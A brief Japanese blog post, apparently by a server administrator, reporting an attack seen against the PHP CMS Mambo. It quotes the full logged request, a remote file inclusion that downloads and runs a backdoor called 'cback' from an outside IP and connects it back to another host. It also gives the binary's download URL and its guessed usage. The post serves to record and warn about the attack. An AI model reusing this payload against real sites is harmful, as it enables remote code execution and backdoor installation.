Mambo?の脆弱性への攻撃 [攻撃]
Mamboってのに対するPHPの脆弱性を付いた攻撃が来ていました。
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
バックドアっぽいcbackというツールはダウンロード可能でした。Linuxの実行ファイルです。
http://216.103.82.214/cback
使い方は、
./cback <接続許可ホスト> <待ちうけポート>
でしょうね。
http://news.mamboserver.com/index.php?option=com_content&task=view&id=2144&Itemid=2
コメント 0